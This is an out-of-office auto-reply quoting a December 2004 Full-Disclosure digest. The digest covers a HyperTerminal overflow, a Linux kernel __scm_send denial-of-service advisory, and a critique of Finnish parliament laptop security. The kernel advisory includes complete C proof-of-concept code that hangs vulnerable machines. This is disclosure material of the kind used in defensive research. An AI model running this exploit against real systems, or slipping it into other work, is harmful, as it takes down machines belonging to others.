[<prev] [next>] [day] [month] [year] [list]
Message-ID: <s1c8aa34.054@PHX-DMZ-SMTP.CAROLLO.COM>
From: HDahlstrom at carollo.com (Harold Dahlstrom)
Subject: Re: Full-Disclosure Digest, Vol 1,
Issue 2116 (Vacation Auto-Reply)
I am out of the office - please contact Doug Hesser, Samuel Nichols, or Manuel Milke for technical issues or Dennis Guarrera for administrative issues.
Thanks
--Harold
>>> full-disclosure 12/19/04 10:00 >>>
Send Full-Disclosure mailing list submissions to
full-disclosure@...ts.netsys.com
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request@...ts.netsys.com
You can reach the person managing the list at
full-disclosure-owner@...ts.netsys.com
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."
Today's Topics:
1. Re: HyperTerminal - Buffer Overflow In .ht File (Gregory Gilliss)
2. [VulnDiscuss] Re: Linux kernel scm_send local DoS
(even multiplexed)
3. E-mail tracking finds murderess and baby in kidnap-homicide
case. (Tamas Feher)
4. Re: Security breach database (Willem Koenings)
5. Insecurity in Finnish parlament (computers) (Markus Jansson)
----------------------------------------------------------------------
Message: 1
Date: Fri, 17 Dec 2004 10:38:23 -0800
From: Gregory Gilliss <ggilliss@...publishing.com>
Subject: Re: [Full-Disclosure] HyperTerminal - Buffer Overflow In .ht
File
To: full-disclosure@...ts.netsys.com
Message-ID: <20041217183823.GA20342@...publishing.com>
Content-Type: text/plain; charset=us-ascii
great, so while I'm using hyperterminal on my network connected machine (!)
to update my hardware for the latest exploit, along comes someone with this
and hacks my client laptop. Somehow I'm glad that I only use UNIX...
-- Greg
On or about 2004.12.15 11:59:56 +0000, Brett Moore (brett.moore@...urity-assessment.com) said:
> ========================================================================
> = HyperTerminal - Buffer Overflow In .ht File
> =
> = MS Bulletin posted:
> = http://www.microsoft.com/technet/security/bulletin/MS04-043.mspx
> =
> = Affected Software:
> = Microsoft Windows NT Server 4.0 SP 6a
> = Microsoft Windows NT Server 4.0 Terminal Server Edition SP6
> = Microsoft Windows 2000 SP4
> = Microsoft Windows XP SP2
> = Microsoft Windows XP 64-Bit Edition SP1
> = Microsoft Windows XP 64-Bit Edition Version 2003
> = Microsoft Windows Server 2003
> = Microsoft Windows Server 2003 64-Bit Edition
> =
> = Public disclosure on December 15, 2004
> ========================================================================
<<SNIP>>
--
Gregory A. Gilliss, CISSP E-mail: greg@...liss.com
Computer Security WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3
------------------------------
Message: 2
Date: Wed, 15 Dec 2004 04:23:22 +0100
From: even multiplexed <Shadow333@....at>
Subject: [Full-Disclosure] [VulnDiscuss] Re: Linux kernel scm_send
local DoS
To: security@...c.pl
Cc: vulnwatch@...nwatch.org, bugtraq@...urityfocus.com,
full-disclosure@...ts.netsys.com
Message-ID: <41BFAE2A.7040002@....at>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Paul Starzetz wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>
>Synopsis: Linux kernel scm_send local DoS
>Product: Linux kernel
>Version: 2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
>Vendor: http://www.kernel.org/
>URL: http://isec.pl/vulnerabilities/isec-0019-scm.txt
>CVE: CAN-2004-1016
>Author: Paul Starzetz <ihaquer@...c.pl>
>Date: Dec 14, 2004
>
>
>Issue:
>======
>
>A locally exploitable flaw has been found in the Linux socket layer,
>that allows a local user to hang a vulnerable machine.
>
>
>Details:
>========
>
>The Linux kernel provides a powerful socket API to user applications.
>Among other functions sockets provide an universal way for IPC and user-
>kernel communication. The socket layer uses several logical sublayers.
>One of the layers, so called auxiliary message layer (or scm layer),
>augments the socket API by an universal user-kernel message passing
>capability (see recvfrom(2) for more details on auxiliary messages).
>
>One of the scm message parsing functions invoked from the kernel
>sendmsg() code is __scm_send() and suffers from a deadlock condition if
>carefully prepared auxiliary message(s) is sent to a socket by an
>unprivileged application.
>
>We believe that the 2.4 kernel branch is not further exploitable. The
>2.6 branch has not been extensively checked, however it may be locally
>exploitable to gain elevated privileges due to its increased complexity.
>
>
>Discussion:
>=============
>
>See attached code.
>
>
>Impact:
>=======
>
>Unprivileged local users may hang a vulnerable Linux machine.
>
>
>Credits:
>========
>
>Paul Starzetz <ihaquer@...c.pl> has identified the vulnerability and
>performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF
>INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF
>ONE OF THE AUTHORS.
>
>
>Disclaimer:
>===========
>
>This document and all the information it contains are provided "as is",
>for educational purposes only, without warranty of any kind, whether
>express or implied.
>
>The authors reserve the right not to be responsible for the topicality,
>correctness, completeness or quality of the information provided in
>this document. Liability claims regarding damage caused by the use of
>any information provided, including any kind of information which is
>incomplete or incorrect, will therefore be rejected.
>
>
>Appendix:
>=========
>
>/*
> * Linux kernel 2.4 & 2.6 __scm_send DoS
> * Warning! this code will hang your machine
> *
> * gcc -O2 scmbang.c -o scmbang
> *
> * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
> *
> * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
> * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
> * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
> *
> */
>
>
>#define _GNU_SOURCE
>#include <stdio.h>
>#include <errno.h>
>#include <sys/socket.h>
>#include <arpa/inet.h>
>
>
>
>static char buf[1024];
>
>
>
>void
>fatal (const char *msg)
>{
> printf ("\n");
> if (!errno)
> {
> fprintf (stderr, "FATAL: %s\n", msg);
> }
> else
> {
> perror (msg);
> }
> printf ("\n");
> fflush (stdout);
> fflush (stderr);
> exit (1);
>}
>
>
>int
>main (void)
>{
> int s[2], r;
> struct sockaddr_in sin;
> struct msghdr *msg;
> struct cmsghdr *cmsg;
>
> r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s);
> if (r < 0)
> fatal ("socketpair");
>
> memset (buf, 0, sizeof (buf));
> msg = (void *) buf;
> msg->msg_control = (void *) (msg + 1);
>
>// make bad cmsgs
> cmsg = (void *) msg->msg_control;
>
> cmsg->cmsg_len = sizeof (*cmsg);
> cmsg->cmsg_level = 0xdeadbebe;
> cmsg->cmsg_type = 12; // len after overflow on second msg
> cmsg++;
>
>// -12 for deadlock
> cmsg->cmsg_len = -12;
> cmsg->cmsg_level = SOL_IP;
> msg->msg_controllen = (unsigned) (cmsg + 1) - (unsigned) msg->msg_control;
> r = sendmsg (s[0], msg, 0);
> if (r < 0)
> fatal ("sendmsg");
>
> printf ("\nYou lucky\n");
> fflush (stdout);
>
> return 0;
>}
>
>- --
>Paul Starzetz
>iSEC Security Research
>http://isec.pl/
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.0.7 (GNU/Linux)
>
>iD8DBQFBvsFeC+8U3Z5wpu4RAkcYAJ9ZANZb3Yt8LHIZHu4YTiKN+Htt3QCfZ0rH
>ZB8QMKmLVyKaQ5fvN/l8mL8=
>=2hQr
>-----END PGP SIGNATURE-----
>
>
>
>
>
Dear Ladies and Gentleman
First of all thanks to mir Starzetz for bringing this bug to our
attention.i just wanted to ask if anyone has a tip for me how to
quickfix this bug, without actually rebuilding a patched version of the
kernel.
id be thankful for every tip.
i hope theres actually a way to do that, cause our customers wouldnt
like that system of ours to reboot:/
greets
Oliver Leitner
------------------------------
Message: 3
Date: Sat, 18 Dec 2004 21:13:24 +0100
From: "Tamas Feher" <etomcat@...email.hu>
Subject: [Full-Disclosure] E-mail tracking finds murderess and baby in
kidnap-homicide case.
To: full-disclosure@...ts.netsys.com
Message-ID: <41C49D74.29818.C2BE56@...alhost>
Content-Type: text/plain; charset=US-ASCII
Not for the faint of heart.
"http://www.cnn.com/2004/US/12/18/fetus.found.ali
ve/index.html"
BTW I love capital punishment!
Regards: Tamas Feher.
------------------------------
Message: 4
Date: Sun, 19 Dec 2004 00:04:06 +0200
From: Willem Koenings <infsec@...il.com>
Subject: Re: [Full-Disclosure] Security breach database
To: full-disclosure@...ts.netsys.com
Message-ID: <9b13f6c1041218140468012145@...l.gmail.com>
Content-Type: text/plain; charset=US-ASCII
> Looking for few interesting security breach stories...
Something to learn from :)
http://www.dataloss.net/papers/how.defaced.apache.org.txt
W.
------------------------------
Message: 5
Date: Sun, 19 Dec 2004 03:19:38 +0200
From: Markus Jansson <markus.jansson@...hmail.com>
Subject: [Full-Disclosure] Insecurity in Finnish parlament (computers)
To: full-disclosure@...ts.netsys.com
Message-ID: <41C4D72A.2010501@...hmail.com>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Short version:
-------------
http://www.markusjansson.net/erecent.html#comments
"The laptop computers used by members of parlament and their assistants
in here Finland have severe security holes. These laptop computers dont
have firewalls, file encryption and wiping tools, automatic update is
not turned on, operating system (WindowsXP) is on its default settings
for most, computers only support 802.11b WLAN which is insecure, etc.
etc. As a bonus, they use TeliaSonera GSM:s which are totally insecure
because they use COMP-128-1 and A5/1 for security. I contacted them
months ago but they havent bothered to answer me, nor to reporters I
have contacted later. Oh dear..."
Long version:
-------------
1. The computers do not have firewall, not even ICF enabled. Users
cannot even enable it themselfes, since they dont have administrative
permissions on the computers. Any remote-exploit vulnerability or bad
passphrase and BUM! The computers is hacked.
2. The computers are mainly on default settings. They are WindowsXP. Do
I really need to say more about this issue and what happens from it?
3. The computers have support for Bluetooth and it is enabled by
default. This leaves many attack vectors inplace that are pretty
numerous for me to tell you. Also, they have firewire enabled, which
means that as in iPod:s case, anyone with such device can walk to one of
these laptops and download everything inside it. Ouch.
4. Laptops have WLAN, but it only supports the totally insecure 802.11b
standard.
5. Computers do not have any kind of encryption programs. All files and
folders are unencrypted. Even the EFS is turned off. There is no way to
secure personal or sensitive documents in the computer.
6. There are no wiping tools in the computers to wipe off sensitive or
personal files from them.
7. Computers do not have "Clear pagefile on shutdown" enabled, meaning
that sensitive data can be recovered from unwashed swapfile later on.
8. Users do not have administrator permissions on computer so they could
install neccessary security programs to them. Ofcourse, there is the
plus side that this *should* limit the damage to the systems
to...well..the user (= the member of parlament or their assistants). Ouch.
9. There are VPN connections in the computers, but it is unclear are
they protected against man-in-the-middle-attacks or not. My educated
guess is that they arent, meaning again...
10. Its unclear are the computers set on "automatic updates" or not. My
educated guess is that they arent, meaning again (especially if you look
at the point 1 again)...ouch.
11. Default browser is Internet Explorer, with default settings
ofcourse. Now, I dont have to tell you how serious security risk this
is, especially if you concider point 10...
12. MEP:s etc. use TeliaSonera GSM:s. The security that TeliaSonera uses
is COMP-128-1 and A5/1, which are all totally insecure and can easily be
broken with a laptop computer etc. meaning that their conversations can
easily be eavesdropped. They should use COMP-128-3 and A5/3 to make it
secure...
13. At TeliaSonera GSM networks, there is no protection against
"false-basestation" techique, which easy bypass of crypto by simply
turning it off from the "basestation". For example, Elisa uses
COMP-128-3 and A5/3 and does not allow phones to turn off crypto even
basestation orders them to do so.
I have contacted about this issue months ago to security personel in our
parlament. They havent even bothered to answer me, not to mention that
they would have fixed the computers security problems. So, here is it,
maybe they'll listen now.
--
???My computer security & privacy related homepage
http://www.markusjansson.net
Use HushTools or GnuPG/PGP to encrypt any email
before sending it to me to protect our privacy.
------------------------------
_______________________________________________
Full-Disclosure mailing list
Full-Disclosure@...ts.netsys.com
https://lists.netsys.com/mailman/listinfo/full-disclosure
End of Full-Disclosure Digest, Vol 1, Issue 2116
************************************************
Powered by blists - more mailing lists